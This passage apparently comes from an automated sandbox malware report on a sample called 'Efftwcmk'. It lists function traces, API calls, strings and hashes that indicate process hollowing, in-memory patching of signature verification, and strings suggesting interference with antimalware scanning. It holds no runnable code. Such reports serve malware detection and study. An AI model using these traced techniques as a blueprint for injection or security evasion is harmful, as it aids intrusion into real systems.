Strings

LCMapStringEx, xrefs: 2D268BCE
Pk)-N)-, xrefs: 2D268BB5

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: String
String ID: LCMapStringEx$Pk)-N)-
API String ID: 2568140703-292492752
Opcode ID: a5fa72498e3088e68739dd2a447efa64dcbcea6c780a3b1a350e74853db2ccdc
Instruction ID: 4759b151d806dc5e64eba17ff21f77ca47f488554bee56d27f17aa1fed7f8d79
Opcode Fuzzy Hash: a5fa72498e3088e68739dd2a447efa64dcbcea6c780a3b1a350e74853db2ccdc
Instruction Fuzzy Hash: CE013232545209FBCF129F90CC04EEEBF72EF49750F018424FE0835160CA369921ABA4

Function 02C87DF4 Relevance: 4.6, APIs: 3, Instructions: 60libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,02C87EC3), ref: 02C87E24
GetModuleHandleW.KERNEL32(?,?,00000000,02C87EC3), ref: 02C87E2A
GetProcAddress.KERNEL32(00000000,00000000,?,?,00000000,02C87EC3), ref: 02C87E43

Part of subcall function 02C87D2C: GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,02C87DB1,?,?,00000000,00000000), ref: 02C87D6D
Part of subcall function 02C87D2C: GetProcAddress.KERNEL32(00000000,kernel32,00000000,00000000,02C87DB1,?,?,00000000,00000000), ref: 02C87D73
Part of subcall function 02C87D2C: VirtualProtect.KERNELBASE(?,?,?,?,00000000,kernel32,00000000,00000000,02C87DB1,?,?,00000000,00000000), ref: 02C87D8D

Part of subcall function 02C87B3C: GetModuleHandleW.KERNEL32(KernelBase,00000000,02C87C40,00000000,00000000,00000000,00000000,00000000,oces,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02C87BBE
Part of subcall function 02C87B3C: GetProcAddress.KERNEL32(00000000,KernelBase,00000000,02C87C40,00000000,00000000,00000000,00000000,00000000,oces,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02C87BC4
Part of subcall function 02C87B3C: GetCurrentProcess.KERNELBASE ref: 02C87BCE

Part of subcall function 02C87A74: GetModuleHandleA.KERNEL32(ntdll,00000000,00000000,02C87AF8,?,?,00000000), ref: 02C87AB8
Part of subcall function 02C87A74: GetProcAddress.KERNEL32(00000000,ntdll,00000000,00000000,02C87AF8,?,?,00000000), ref: 02C87ABE
Part of subcall function 02C87A74: NtWriteVirtualMemory.NTDLL(?,?,?,?,?,00000000,ntdll,00000000,00000000,02C87AF8,?,?,00000000), ref: 02C87ADC

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc$Virtual$CurrentLibraryLoadMemoryProcessProtectWrite
String ID:
API String ID: 3496194007-0
Opcode ID: 833e19eddf9697959a16223da18efbb55df48e75d708ffe81c470ce8342f20c9
Instruction ID: 0161ba517762354ff6973256f545ad94f8b8794e8faf51d423ed01cfec014359
Opcode Fuzzy Hash: 833e19eddf9697959a16223da18efbb55df48e75d708ffe81c470ce8342f20c9
Instruction Fuzzy Hash: D31191B5A40704BFE750FBA4DC52A5FB7AEFB44718F604568A208A7680EA399900EB14

Function 2D2684CA Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,2D268839,00000006,FlsSetValue,2D27F160,2D27F168,00000000,00000364,?,2D2682E7,00000000), ref: 2D26852A
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 2D268537

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: 2d3b84a313abddb9f63b59d9a457a874882a10e61ff000b4f3eb7df8ee248bb2
Instruction ID: fc6b084aedceae624a4d31a32647f15926a410afa7e6b12351480587ab0c24f4
Opcode Fuzzy Hash: 2d3b84a313abddb9f63b59d9a457a874882a10e61ff000b4f3eb7df8ee248bb2
Instruction Fuzzy Hash: 6711E7376413329BDB12DD1DCC40AABB3A5EB84B647138160EE14BB284F731EC818AF1

Function 02C715CC Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02C71A03), ref: 02C715E2

Strings

T, xrefs: 02C7161D, 02C7163A

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: T
API String ID: 4275171209-1611120390
Opcode ID: 3fbb129994c1663b6f1caf83ae9f36f495e206e7b3fe7c9186e1c89d126dae99
Instruction ID: 0cb1821235f907fdc858e22a42039b799181a344f5555d061c9795569d8793a0
Opcode Fuzzy Hash: 3fbb129994c1663b6f1caf83ae9f36f495e206e7b3fe7c9186e1c89d126dae99
Instruction Fuzzy Hash: E8F03AF0B513004FEB49DF7999913167BD6F789348F24867EE609DB398EBB186128B10

Function 2D22165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
Instruction ID: 5e1bb5d9192a8e23301d267ed9b073714c5006d27567e5174eef30641d212028
Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
Instruction Fuzzy Hash: E7F0E2706986125AD70E8F30CC58F3F76D99F80251F24CB2DF01AF50D0C734C9928601

Function 02CB714D Relevance: 1.5, APIs: 1, Instructions: 47libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(0000C087,?,?,?,00000000,02CB70C7,?,?,?,?,?), ref: 02CB7160

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002CB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2cb7000_Efftwcmk.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4de58a5fadcc9b5f57351689ab0bdeeaf374be54e4febec57efd0a0d01bbac60
Instruction ID: 4be21054298dd7febdf9193ff211915daee6a326a8af698cbef936a470d485c5
Opcode Fuzzy Hash: 4de58a5fadcc9b5f57351689ab0bdeeaf374be54e4febec57efd0a0d01bbac60
Instruction Fuzzy Hash: 9CF081B36093179BAB118E55CC546B7F3A8AED1169F0A0428EC8AD7209E725E809C7B0

Function 2D265AF3 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,2D2682CA,00000001,00000364,?,00000000,?,2D25BC87,00000000,?,?,2D25BD0B,00000000), ref: 2D265B34

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 237e3077146d9a095d9948ac42aa3ed64f9e498e9e176ef479d87971df47533a
Instruction ID: 8569e77d4a1b61850bae8ad8ab7450e96338a5cd11d11cb8650750c275020fc9
Opcode Fuzzy Hash: 237e3077146d9a095d9948ac42aa3ed64f9e498e9e176ef479d87971df47533a
Instruction Fuzzy Hash: 81F0E9326D532966DB215A22CC44F6B775DFF616B0F118021EF04BA18CDF20E48086F4

Function 2D266137 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,2D2552BC,?,?,2D258847,?,?,00000000,2D296B50,?,2D22DE62,2D2552BC,?,?,?,?), ref: 2D266169

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b8ccf8ae3016b60a6ba03d907a1734bedd77beae8c216bf17976241afe15938
Instruction ID: 4879c4c4807fbcd1690d669285ddbb8df49cc8a12fc6ccd1aacbf33fae6c0c15
Opcode Fuzzy Hash: 5b8ccf8ae3016b60a6ba03d907a1734bedd77beae8c216bf17976241afe15938
Instruction Fuzzy Hash: 75E0E5311C439676D71216654C08B5B3B6DEF816A2F2141E0DE04B23C2EE24D4C041F4

Function 02C75814 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(02C70000,?,00000105), ref: 02C75832

Part of subcall function 02C75A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C70000,02C9A790), ref: 02C75A94
Part of subcall function 02C75A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 02C75AB2
Part of subcall function 02C75A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02C75AD0
Part of subcall function 02C75A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C75AEE
Part of subcall function 02C75A78: RegQueryValueExA.ADVAPI32 ref: 02C75B37
Part of subcall function 02C75A78: RegQueryValueExA.ADVAPI32 ref: 02C75B55
Part of subcall function 02C75A78: RegCloseKey.ADVAPI32(?), ref: 02C75B77

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
Instruction ID: 940d9bfaf485f2e7ed7b0d1d769de1334df273cd3fa633768ba28d70f42a813d
Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
Instruction Fuzzy Hash: EFE09271A403148FCB10DE6CC8C1B5637D8AF08790F440965EC68DF34AD3B0DA108BD0

Function 02C77E08 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02C8E34C,ScanString,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,ScanString,02CAF358,02C974BC,UacScan,02CAF358,02C974BC,UacInitialize), ref: 02C77E13

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 0e95aad3414f9b9c2a2109699958fa49b390097b3f52a26050f892d7429b04e1
Instruction ID: 71e1c141d1eb6d59eb26f31a88b8353697c4fb479c4c3de8a8c28123af6a2bd5
Opcode Fuzzy Hash: 0e95aad3414f9b9c2a2109699958fa49b390097b3f52a26050f892d7429b04e1
Instruction Fuzzy Hash: 8CC08CB1305A000E9A6475FC0CC441B428C09842383A41E71E079C62D2D331891B3810

Function 02C77E2C Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02C913E1,ScanString,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,ScanBuffer,02CAF358,02C974BC,ScanString), ref: 02C77E37

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 402d99361340c0d933afbb412631b9ac4ad4834bfd450701127e11a6c8c5f0c3
Instruction ID: 9743831294be8631037529d784970a833e49f86b0408052050aaa360b7511eb1
Opcode Fuzzy Hash: 402d99361340c0d933afbb412631b9ac4ad4834bfd450701127e11a6c8c5f0c3
Instruction Fuzzy Hash: 07C08CA03012080E9EA075FC1CC0A5A428D09842343A02A21F478D62C2D321883A3810

Function 02C97F44 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

timeSetEvent.WINMM(00002710,00000000,02C97F38,00000000,00000001), ref: 02C97F54

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: Eventtime
String ID:
API String ID: 2982266575-0
Opcode ID: fed93c41c8df8b6b99f9e80449738dff1f7c0438609be0705d48088fb61d5908
Instruction ID: 21d76b22106b947f73ddc525081491e251d4ea6bf8a6c733589d8efca770dd2e
Opcode Fuzzy Hash: fed93c41c8df8b6b99f9e80449738dff1f7c0438609be0705d48088fb61d5908
Instruction Fuzzy Hash: 57C092F07E63003EFA209AA51CC6F23618DE315B01F200416B600EEAC1D5F748105E78

Function 02C71682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 02C716A4

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ce25d75decc1bf637182a7cb8c375e665af543d03cb9a077935793cecbb675ce
Instruction ID: 24859a4c9e216222631d1d173df31b8378f8696f6aab575515fd69db5f878525
Opcode Fuzzy Hash: ce25d75decc1bf637182a7cb8c375e665af543d03cb9a077935793cecbb675ce
Instruction Fuzzy Hash: D9F0B4B2B407956BE7109F5A9C80792BB94FB40318F054639FA4CD7340D7B0A8108BD4

Function 02C716E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000), ref: 02C71704

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 07ed1bcebdec31e82d871409e4acad46d4fc5660bb7826e3cea76dd273b5e1a6
Instruction ID: 601078bb71aa4e332ceb485a5507bd6d42b231e6c5a3613b30b5a01f6629923b
Opcode Fuzzy Hash: 07ed1bcebdec31e82d871409e4acad46d4fc5660bb7826e3cea76dd273b5e1a6
Instruction Fuzzy Hash: 0FE0C275300311AFE7205B7E5D84B12BBDDEB986A4F2C4476F609DB291D2F0E8109B60

Non-executed Functions

Function 02C8816E Relevance: 54.1, APIs: 8, Strings: 22, Instructions: 1577nativeprocessthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 02C87DF4: LoadLibraryW.KERNEL32(?,00000000,02C87EC3), ref: 02C87E24
Part of subcall function 02C87DF4: GetModuleHandleW.KERNEL32(?,?,00000000,02C87EC3), ref: 02C87E2A
Part of subcall function 02C87DF4: GetProcAddress.KERNEL32(00000000,00000000,?,?,00000000,02C87EC3), ref: 02C87E43

CreateProcessAsUserW.ADVAPI32 ref: 02C8866E
GetThreadContext.KERNEL32(00000000,02CAF400), ref: 02C88A07
NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,-00000008,02CAF4D4,00000004,02CAF4DC,ScanBuffer,02CAF384,02C89CD0,ScanString,02CAF384,02C89CD0,Initialize,02CAF384,02C89CD0,UacScan,02CAF384), ref: 02C88C64
NtUnmapViewOfSection.N(00000000,?,ScanBuffer,02CAF384,02C89CD0,ScanString,02CAF384,02C89CD0,Initialize,02CAF384,02C89CD0,00000000,-00000008,02CAF4D4,00000004,02CAF4DC), ref: 02C88DDF

Part of subcall function 02C87924: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02C87931
Part of subcall function 02C87924: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02C87937
Part of subcall function 02C87924: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02C87957

Strings

UacInitialize, xrefs: 02C88432, 02C88793, 02C88917, 02C88A1B, 02C89735
SLGetLicenseInformation, xrefs: 02C8875F
MiniDumpWriteDump, xrefs: 02C89B19
Initialize, xrefs: 02C884EA, 02C88AFD, 02C88C84, 02C8906D, 02C892CF, 02C8943F, 02C895B2, 02C89817
MiniDumpReadDumpStream, xrefs: 02C89B2D
advapi32, xrefs: 02C89B0A
BCryptQueryProviderRegistration, xrefs: 02C8998C
NtSetSecurityObject, xrefs: 02C89B41
BCryptRegisterProvider, xrefs: 02C899A0
ScanBuffer, xrefs: 02C882CC, 02C88354, 02C886EF, 02C88804, 02C888A6, 02C88BDF, 02C88D66, 02C88EF9, 02C890DE, 02C891F3, 02C893B1, 02C89521, 02C89694, 02C89888, 02C89AA6, 02C89BE1
NtReadVirtualMemory, xrefs: 02C89A25
dbgcore, xrefs: 02C89B1E, 02C89B32
NtOpenObjectAuditAlarm, xrefs: 02C89A39, 02C89AF1
ScanString, xrefs: 02C88202, 02C883AD, 02C8855B, 02C88988, 02C88B6E, 02C88CF5, 02C89182, 02C89340, 02C894B0, 02C89623, 02C8990E, 02C899BB
bcrypt, xrefs: 02C8997D, 02C89991, 02C899A5
ntdll, xrefs: 02C89A2A, 02C89A3E, 02C89AF6, 02C89B46, 02C89B5A
BCryptVerifySignature, xrefs: 02C89978
sppc, xrefs: 02C88776
UacScan, xrefs: 02C88273, 02C8848B, 02C88A8C, 02C88E88, 02C88FFC, 02C897A6
I_QueryTagInformation, xrefs: 02C89B05
OpenSession, xrefs: 02C881A9, 02C885CC, 02C8867E, 02C89A54, 02C89B70
NtOpenProcess, xrefs: 02C89B55

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: AddressHandleMemoryModuleProcVirtual$AllocateContextCreateLibraryLoadProcessReadSectionThreadUnmapUserView
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 3979268988-51457883
Opcode ID: a31e268e113281531125b647dbcbecc4e5845581a0a3a2e09975be8f11822c79
Instruction ID: 9885599cca0686f670a66334b532815b62dd78ade7341abbd23de9007850f8cc
Opcode Fuzzy Hash: a31e268e113281531125b647dbcbecc4e5845581a0a3a2e09975be8f11822c79
Instruction Fuzzy Hash: 30E2EC75B505689BDB25FB64CD80BDEB3BABF45304F1081A2E109AB324DB31AE45EF14

Function 02C758B4 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,02C76BC0,02C70000,02C9A790), ref: 02C758D1
GetProcAddress.KERNEL32(?,GetLongPathNameA,kernel32.dll,02C76BC0,02C70000,02C9A790), ref: 02C758E8
lstrcpynA.KERNEL32(?,?,?), ref: 02C75918
lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02C76BC0,02C70000,02C9A790), ref: 02C7597C
lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02C76BC0,02C70000,02C9A790), ref: 02C759B2
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02C76BC0,02C70000,02C9A790), ref: 02C759C5
FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C76BC0,02C70000,02C9A790), ref: 02C759D7
lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C76BC0,02C70000,02C9A790), ref: 02C759E3
lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C76BC0,02C70000), ref: 02C75A17
lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C76BC0), ref: 02C75A23
lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02C75A45

Strings

\, xrefs: 02C759F5
GetLongPathNameA, xrefs: 02C758DF
kernel32.dll, xrefs: 02C758CC

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: 0cb3a40b63a9c43a5ede207bf0bcadb8b99182190058717cc9fe5b58a4c318c1
Instruction ID: 7c3012bfc8be27ae46d2d50e447dd2887e79486a482c4c05cf2d88ccb56d67cc
Opcode Fuzzy Hash: 0cb3a40b63a9c43a5ede207bf0bcadb8b99182190058717cc9fe5b58a4c318c1
Instruction Fuzzy Hash: 1C418F72D40258AFDB10DAE8CC88AEEB7BDEF483A0F4845A5E948E7241D7709B44DF50

Function 02C75B84 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON

Download Yara Rule

APIs

lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02C75B94
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02C75BA1
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02C75BA7
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02C75BD2
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C75C19
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C75C29
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C75C51
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C75C61
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02C75C87
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02C75C97

Strings

Software\Borland\Delphi\Locales, xrefs: 02C75AE4
Software\Borland\Locales, xrefs: 02C75AA8, 02C75AC6

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1599918012-2375825460
Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
Instruction ID: 4a6b3d20eda25259e785bf4f15ea7e8d849bb35511d20e44c254ff3a1f03eddc
Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
Instruction Fuzzy Hash: 483184B1E4061C2AFB25D6B8DC85FEF7BAD5B543C0F4801E19A08E6181DBB49F849F90

Function 02C87CA8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40librarynativeloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02CAF384,02C8998C,ScanString,02CAF384,02C89CD0,ScanBuffer,02CAF384,02C89CD0,Initialize,02CAF384,02C89CD0,UacScan), ref: 02C87CBC
GetProcAddress.KERNEL32(00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02CAF384,02C8998C,ScanString,02CAF384,02C89CD0,ScanBuffer,02CAF384,02C89CD0,Initialize,02CAF384), ref: 02C87CD6
NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,02CAF368,00000001,02CAF374,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02CAF384,02C8998C,ScanString,02CAF384,02C89CD0), ref: 02C87CFC
FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02CAF384,02C8998C,ScanString,02CAF384,02C89CD0,ScanBuffer,02CAF384,02C89CD0,Initialize), ref: 02C87D12

Strings

bcrypt, xrefs: 02C87CBB
BCryptVerifySignature, xrefs: 02C87CCF

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
String ID: BCryptVerifySignature$bcrypt
API String ID: 1002360270-4067648912
Opcode ID: 9ba8bdff92b84a6c696fca9dcfadbdc393e943589ff78b2d2aae08fbd653325e
Instruction ID: 256ea8f9bb11375f07d1e9101f8263b7de43e56cdb7f6d025ac8a994eff60e18
Opcode Fuzzy Hash: 9ba8bdff92b84a6c696fca9dcfadbdc393e943589ff78b2d2aae08fbd653325e
Instruction Fuzzy Hash: 54F0A471A82214AED350AA68AC44BAB77DCA78576DF104A2EB118C7540D7BA1815CB60

Function 02C8CF48 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON

Download Yara Rule

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C8D086

Strings

Initialize, xrefs: 02C8CF76
OpenSession, xrefs: 02C8D028
ScanBuffer, xrefs: 02C8CFCF

Memory Dump Source

